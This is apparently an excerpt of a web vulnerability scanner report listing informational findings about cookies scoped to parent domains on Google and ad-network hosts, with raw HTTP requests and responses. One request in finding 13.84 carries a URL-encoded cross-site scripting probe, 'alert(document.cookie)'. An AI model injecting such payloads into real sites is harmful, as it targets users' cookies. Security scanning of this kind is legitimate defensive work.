Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • PREF=ID=d431de1ea54b0d62:TM=1295881314:LM=1295881314:S=NrIf36hJf5JjvkvE; expires=Wed, 23-Jan-2013 15:01:54 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /books HTTP/1.1
Host: books.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:01:54 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=d431de1ea54b0d62:TM=1295881314:LM=1295881314:S=NrIf36hJf5JjvkvE; expires=Wed, 23-Jan-2013 15:01:54 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: OFE/0.1
Connection: close

<!DOCTYPE html><html><head><script>(function(){function a(d){this.t={};this.tick=function(e,f,b){b=b?b:(new Date).getTime();this.t[e]=[b,f]};this.tick("start",null,d)}var c=new a;window.jstiming={Time
...[SNIP]...

13.78. http://bs.serving-sys.com/BurstingPipe/adServer.bs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • A3=gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001; expires=Sun, 24-Apr-2011 17:21:02 GMT; domain=.serving-sys.com; path=/
  • B3=7lgH0000000001sG852G0000000003sS8cVQ0000000001sV83xP0000000001sF7gi30000000001sG852z0000000001sS852A0000000001sS; expires=Sun, 24-Apr-2011 17:21:02 GMT; domain=.serving-sys.com; path=/
  • u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Sun, 24-Apr-2011 17:21:02 GMT; domain=.serving-sys.com; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=tf&c=19&mc=imp&pli=2150004&PluID=0&ord=1295907707715&rtu=-1 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=250&rand=53705905654
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A3=gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001; B3=7lgH0000000001sG852G0000000003sS83xP0000000001sF7gi30000000001sG852z0000000001sS852A0000000001sS; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Location: http://ds.serving-sys.com/BurstingCachedScripts/Res/Blank_1x1.gif
Server: Microsoft-IIS/7.5
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Sun, 24-Apr-2011 17:21:02 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001; expires=Sun, 24-Apr-2011 17:21:02 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=7lgH0000000001sG852G0000000003sS8cVQ0000000001sV83xP0000000001sF7gi30000000001sG852z0000000001sS852A0000000001sS; expires=Sun, 24-Apr-2011 17:21:02 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Sun, 24-Apr-2011 17:21:02 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 24 Jan 2011 22:21:02 GMT
Connection: close


13.79. http://c7.zedo.com/OzoDB/cutils/R52_9/jsc/305/egc.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /OzoDB/cutils/R52_9/jsc/305/egc.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • FFCap=1463B1219,174796:933,196008:0,0|0,11,1:0,17,1:0,21,0;expires=Wed, 23 Feb 2011 22:30:29 GMT;path=/;domain=.zedo.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /OzoDB/cutils/R52_9/jsc/305/egc.js HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; ZFFAbh=749B826,20|1483_749#365; FFCap=1463B1219,174796:933,196008|0,11,1:0,17,1;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 6
Content-Type: application/x-javascript
Set-Cookie: FFCap=1463B1219,174796:933,196008:0,0|0,11,1:0,17,1:0,21,0;expires=Wed, 23 Feb 2011 22:30:29 GMT;path=/;domain=.zedo.com;
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
X-Varnish: 1041103803 1040114911
Cache-Control: max-age=996206
Expires: Sat, 05 Feb 2011 11:13:55 GMT
Date: Mon, 24 Jan 2011 22:30:29 GMT
Connection: close



13.80. http://c7.zedo.com/bar/v16-401/c5/jsc/gl.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/gl.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • FFgeo=5386156;expires=Tue, 24 Jan 2012 21:54:47 GMT;domain=.zedo.com;path=/;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bar/v16-401/c5/jsc/gl.js HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=2290/2289/1;s=788;d=9;w=300;h=250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; FFgeo=5386156; FFCap=1463B1219,174796:933,196008|0,11,1:0,17,1; ZFFAbh=749B826,20|1483_749#365

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 399
Content-Type: application/x-javascript
Set-Cookie: FFgeo=5386156;expires=Tue, 24 Jan 2012 21:54:47 GMT;domain=.zedo.com;path=/;
ETag: "91bd5740-5d7-4988a5ba08d40"
Vary: Accept-Encoding
X-Varnish: 1882666809
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=283434
Expires: Fri, 28 Jan 2011 04:38:41 GMT
Date: Mon, 24 Jan 2011 21:54:47 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var zzl='en-US';


if(typeof zzGeo=='undefined'){
var zzGeo=254;}
if(typeof zzCountry=='undefined'){
var zzCountry=255;}
if(typeof
...[SNIP]...

13.81. http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0Rw6qcLcmo_34070076.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ;Path=/;Domain=.w55c.net;Expires=Thu, 24-Jan-13 01:35:43 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i/0Rw6qcLcmo_34070076.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZlWGxrR1ZjeA&ciu=MFJ3NnFjTGNtbw&reqid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkU&ccw=SUFCMTkjMC4wfElBQjE1IzAuMHxJQUIxOSMwLjB8SUFCMTUjMC4w&epid=&bp=158&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&refurl= HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ;Path=/;Domain=.w55c.net;Expires=Thu, 24-Jan-13 01:35:43 GMT
Cneonction: close
Nncoection: close
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Wed, 12 Jan 2011 22:15:42 GMT
Date: Tue, 25 Jan 2011 01:06:57 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1336

<div style="height: 0; line-height: 0; border: 0; margin: 0; padding: 0; display: none; "><img src="http://rts-rr14.sldc.dataxu.net/x/bcs0?btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUt
...[SNIP]...

13.82. http://click.linksynergy.com/fs-bin/click

Summary

Severity:   Information
Confidence:   Certain
Host:   http://click.linksynergy.com
Path:   /fs-bin/click

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • lsn_statp=PnziUhIAAACuZBF8o1XyYQ%3D%3D; Domain=.linksynergy.com; Expires=Sun, 19-Jan-2031 15:01:55 GMT; Path=/
  • lsn_qstring=Xy0hOcdtU4s%3A145238%3A; Domain=.linksynergy.com; Expires=Tue, 25-Jan-2011 15:01:55 GMT; Path=/
  • lsn_track=UmFuZG9tSVZr%2B5Qg95vOvRInoLj5bFWQpPhvmyUyQZxMl7BXvJRnSunPLcEDNpg8RczJ2bC7B6SGP9QTzTIiJg%3D%3D; Domain=.linksynergy.com; Expires=Thu, 21-Jan-2021 15:01:55 GMT; Path=/
  • lsclick_mid24808="2011-01-24 15:01:55.807|Xy0hOcdtU4s-DyfF4yfSMJkYwTSt3bjXEg"; Domain=.linksynergy.com; Expires=Wed, 23-Jan-2013 15:01:55 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fs-bin/click?id=Xy0hOcdtU4s&offerid=145238.1405647&type=2&subid=0 HTTP/1.1
Host: click.linksynergy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: lsn_statp=PnziUhIAAACuZBF8o1XyYQ%3D%3D; Domain=.linksynergy.com; Expires=Sun, 19-Jan-2031 15:01:55 GMT; Path=/
Set-Cookie: lsn_qstring=Xy0hOcdtU4s%3A145238%3A; Domain=.linksynergy.com; Expires=Tue, 25-Jan-2011 15:01:55 GMT; Path=/
Set-Cookie: lsn_track=UmFuZG9tSVZr%2B5Qg95vOvRInoLj5bFWQpPhvmyUyQZxMl7BXvJRnSunPLcEDNpg8RczJ2bC7B6SGP9QTzTIiJg%3D%3D; Domain=.linksynergy.com; Expires=Thu, 21-Jan-2021 15:01:55 GMT; Path=/
Set-Cookie: lsclick_mid24808="2011-01-24 15:01:55.807|Xy0hOcdtU4s-DyfF4yfSMJkYwTSt3bjXEg"; Domain=.linksynergy.com; Expires=Wed, 23-Jan-2013 15:01:55 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa OUR BUS STA"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Mon, 24 Jan 2011 15:01:55 GMT
Cache-Control: no-cache
Pragma: no-cache
Location: http://memberservices.informit.com/affiliates/gateway.ashx?siteID=Xy0hOcdtU4s-DyfF4yfSMJkYwTSt3bjXEg&url=http%3A%2F%2Fwww.informit.com%2Fstore%2Fproduct.aspx%3Fisbn%3D0321704215
Content-Length: 0
Connection: close


13.83. http://code.google.com/p/swfobject/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://code.google.com
Path:   /p/swfobject/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • PREF=ID=2a7ca615dc37f0d1:TM=1295908254:LM=1295908254:S=00p2bA3htJm-NcjW; expires=Wed, 23-Jan-2013 22:30:54 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p/swfobject/ HTTP/1.1
Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:30:54 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Set-Cookie: PREF=ID=2a7ca615dc37f0d1:TM=1295908254:LM=1295908254:S=00p2bA3htJm-NcjW; expires=Wed, 23-Jan-2013 22:30:54 GMT; path=/; domain=.google.com
Server: codesite
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html>
<html>
<head>
<link rel="icon" type="image/vnd.microsoft.icon" href="http://www.gstatic.com/codesite/ph/images/phosting.ico">

<script type="text/javascript">

(function(){funct
...[SNIP]...

13.84. http://cspix.media6degrees.com/orbserv/hbpix

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cspix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • acs=015020a0e0f0g1lebnnsxzt1181qqxzt1181qqxzt1181qqxzt1181qq; Domain=media6degrees.com; Expires=Sat, 23-Jul-2011 21:08:43 GMT; Path=/
  • adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; Domain=media6degrees.com; Expires=Sat, 23-Jul-2011 21:08:43 GMT; Path=/
  • clid=2lebnns011706ch47d7o8wtv181qq00f0o01050110e; Domain=media6degrees.com; Expires=Sat, 23-Jul-2011 21:08:43 GMT; Path=/
  • rdrlst=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; Domain=media6degrees.com; Expires=Sat, 23-Jul-2011 21:08:43 GMT; Path=/
  • sglst=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; Domain=media6degrees.com; Expires=Sat, 23-Jul-2011 21:08:43 GMT; Path=/
  • vstcnt=3lebnns021l034e2061201181qq4fhux122q000000axzm000000d1t30d1rq0d1qh0d1te000000d1ss0d1px0d1s00d1t20d1sn0d1rp0d1rb0d1t40d1rr0d1s70d1qu0d1q60d1ps0d1r70d1pu0d1rf0d1r10d1r40d1qx0d1ql0d1pr0d1r60d1sm0d1r90d1pw0d1qw0d1qc0d1sr0d1qz0d1sq0d1se0d1rm0d1qj0d1rg0d1t90d1rw0d1pl0d1qe0d1q50d1rc0d1q20d1so0d1t00d1ro0d1su0d1sd0d1qa0d1tb0d1qv0d1s10d1qo0d1r00d1s40d1qi0d1t80d1tf0d1st0d1py0d1rh0d1rd0d1sz0d1qm0d1q40d1q10d1r80d1pv0d1rk0d1s20d1sk0d1tc0d1rj0d1qb0d1pm0d1r20d1sc0d1rl0d1qg0d1ta0d1rt0d1t50d1rs0d1r30d1pq0d1si0d1t70d1sj0d1ru0000000000000004esx7120104tej0r013ik5120o0keqa0pk2n0kh4a0kh3u0kh490kh3s0kh3t0kh3m0kh3a0kh3y0kh3j0kh3h0kh390kh3x0kh3v0kh4b0kh3d0kh3f0kh3r0kh3l0kh430kh3g0kh3p0kh3z; Domain=media6degrees.com; Expires=Sat, 23-Jul-2011 21:08:43 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d1ec56b7612a62c&curl=http%3a%2f%2fwww.abbreviations.com%2fbs.aspx%3fst%3db1.aspx51536%253Cscript%253Ealert(document.cookie)%253C%2fscript%253E7a00ceef170%26SE%3d3%26r%3d1 HTTP/1.1
Host: cspix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh30.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: acs=015020a0e0f0g1lebnnsxzt1ibglxzt1wsurxzt1wsurxzt1wsur; ipinfo=2lf8gij0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; vstcnt=3lebnns020r013ik5120o0keqa0pk2n0kh4a0kh3u0kh490kh3s0kh3t0kh3m0kh3a0kh3y0kh3j0kh3h0kh390kh3x0kh3v0kh4b0kh3d0kh3f0kh3r0kh3l0kh430kh3g0kh3p0kh3z1l024fhux122p000000axzm000000d1t30d1rq0d1qh0d1te000000d1ss0d1px0d1s00d1t20d1sn0d1rp0d1rb0d1t40d1rr0d1s70d1qu0d1q60d1ps0d1r70d1pu0d1rf0d1r10d1r40d1qx0d1ql0d1pr0d1r60d1sm0d1r90d1pw0d1qw0d1qc0d1sr0d1qz0d1sq0d1se0d1rm0d1qj0d1rg0d1t90d1rw0d1pl0d1qe0d1q50d1rc0d1q20d1so0d1t00d1ro0d1su0d1sd0d1qa0d1tb0d1qv0d1s10d1qo0d1r00d1s40d1qi0d1t80d1tf0d1st0d1py0d1rh0d1rd0d1sz0d1qm0d1q40d1q10d1r80d1pv0d1rk0d1s20d1sk0d1tc0d1rj0d1qb0d1pm0d1r20d1sc0d1rl0d1qg0d1ta0d1rt0d1t50d1rs0d1r30d1pq0d1si0d1t70d1sj0d1ru00000000004esx7120104tej; adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; clid=2lebnns011706ch47d7o8wtv129yk00e0l01040210d; rdrlst=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; sglst=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

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: acs=015020a0e0f0g1lebnnsxzt1181qqxzt1181qqxzt1181qqxzt1181qq; Domain=media6degrees.com; Expires=Sat, 23-Jul-2011 21:08:43 GMT; Path=/
Set-Cookie: adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; Domain=media6degrees.com; Expires=Sat, 23-Jul-2011 21:08:43 GMT; Path=/
Set-Cookie: clid=2lebnns011706ch47d7o8wtv181qq00f0o01050110e; Domain=media6degrees.com; Expires=Sat, 23-Jul-2011 21:08:43 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=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; Domain=media6degrees.com; Expires=Sat, 23-Jul-2011 21:08:43 GMT; Path=/
Set-Cookie: sglst=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; Domain=media6degrees.com; Expires=Sat, 23-Jul-2011 21:08:43 GMT; Path=/
Set-Cookie: vstcnt=3lebnns021l034e2061201181qq4fhux122q000000axzm000000d1t30d1rq0d1qh0d1te000000d1ss0d1px0d1s00d1t20d1sn0d1rp0d1rb0d1t40d1rr0d1s70d1qu0d1q60d1ps0d1r70d1pu0d1rf0d1r10d1r40d1qx0d1ql0d1pr0d1r60d1sm0d1r90d1pw0d1qw0d1qc0d1sr0d1qz0d1sq0d1se0d1rm0d1qj0d1rg0d1t90d1rw0d1pl0d1qe0d1q50d1rc0d1q20d1so0d1t00d1ro0d1su0d1sd0d1qa0d1tb0d1qv0d1s10d1qo0d1r00d1s40d1qi0d1t80d1tf0d1st0d1py0d1rh0d1rd0d1sz0d1qm0d1q40d1q10d1r80d1pv0d1rk0d1s20d1sk0d1tc0d1rj0d1qb0d1pm0d1r20d1sc0d1rl0d1qg0d1ta0d1rt0d1t50d1rs0d1r30d1pq0d1si0d1t70d1sj0d1ru0000000000000004esx7120104tej0r013ik5120o0keqa0pk2n0kh4a0kh3u0kh490kh3s0kh3t0kh3m0kh3a0kh3y0kh3j0kh3h0kh390kh3x0kh3v0kh4b0kh3d0kh3f0kh3r0kh3l0kh430kh3g0kh3p0kh3z; Domain=media6degrees.com; Expires=Sat, 23-Jul-2011 21:08:43 GMT; Path=/
Location: http://tag.admeld.com/match?admeld_adprovider_id=304&external_user_id=6ch47d7o8wtv&_mydatasegment=foo&expiration=30days
Content-Length: 0
Date: Mon, 24 Jan 2011 21:08:43 GMT


13.85. http://dave.willfork.com/slrnface/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dave.willfork.com
Path:   /slrnface/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • tu=5b32519ccc82f0294fbd5165fdf92ac0; expires=Tue, 31-Dec-2019 23:00:00 GMT; path=/; domain=willfork.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /slrnface/ HTTP/1.1
Host: dave.willfork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:01:58 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tu=5b32519ccc82f0294fbd5165fdf92ac0; expires=Tue, 31-Dec-2019 23:00:00 GMT; path=/; domain=willfork.com; httponly
Vary: User-Agent,Accept-Encoding
Content-Length: 6
Content-Type: text/html
X-Cache: MISS from 533313
Connection: close

<b-ua>

13.86. http://delb.opt.fimserve.com/fimbid/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://delb.opt.fimserve.com
Path:   /fimbid/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • UI="284ab5a022ca529df|79973..9.fh.wx.f.488@@gc@@dzhsrmtglm@@-4_9@@hlugozbvi gvxsmloltrvh rmx_@@xln@@nrw zgozmgrx"; Domain=.opt.fimserve.com; Expires=Fri, 22-Jan-2021 02:05:10 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fimbid/?cachebuster=1295921111939Gck&cb=window[%22AIIcb%22]&sz=728x90&api=2&enc=1.1&est=b560d84a436c1f260f16c34efa66d8e3&l=52f2b867-a818-426d-a674-eefac27a73f6&ega=&neg=&pub=2094107610&pcat=29&ck=1&fl=1&d=http%3A%2F%2Fwww.netlingo.com%2F HTTP/1.1
Host: delb.opt.fimserve.com
Proxy-Connection: keep-alive
Referer: http://www.netlingo.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pfuid=ClIoJk0pDkd8SnPo7AmDAg==; UI=284ab5a022ca529df|f..9.f.f.f.f@@f@@f@@f@@f@@f@@f; LO=00JW6MJ6I1c0G05B0010OPU; ssrtb=0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://www.fimserve.com/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR DELa SAMa UNRa OTRa IND UNI PUR NAV INT DEM CNT PRE"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: DMEXP=4; Domain=.opt.fimserve.com; Expires=Wed, 09-Feb-2011 02:05:10 GMT; Path=/
Set-Cookie: UI="284ab5a022ca529df|79973..9.fh.wx.f.488@@gc@@dzhsrmtglm@@-4_9@@hlugozbvi gvxsmloltrvh rmx_@@xln@@nrw zgozmgrx"; Domain=.opt.fimserve.com; Expires=Fri, 22-Jan-2021 02:05:10 GMT; Path=/
Set-Cookie: RTB=|2937.l.931830; Domain=delb.opt.fimserve.com; Expires=Tue, 01-Feb-2011 02:05:10 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 414
Date: Tue, 25 Jan 2011 02:05:10 GMT

window["AIIcb"]={"r":{"sb":250376,"s":"471D7F0124D207BA9A40CE442FD37ED1","ad":"http://delb.opt.fimserve.com/bidimp/?ek=AOb2kFWWo584nB3I07WnKWrRBKeP4UX2EIXzUl_oiuySRCRwepH6n3-YHiF_hVbgrMPpsVthY8EJlhEFk
...[SNIP]...

13.87. http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1596198292@x23

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • RMFM=011PhXovU106w2; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.mookie1.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:35:45 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFM=011PhXovU106w2; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.mookie1.com
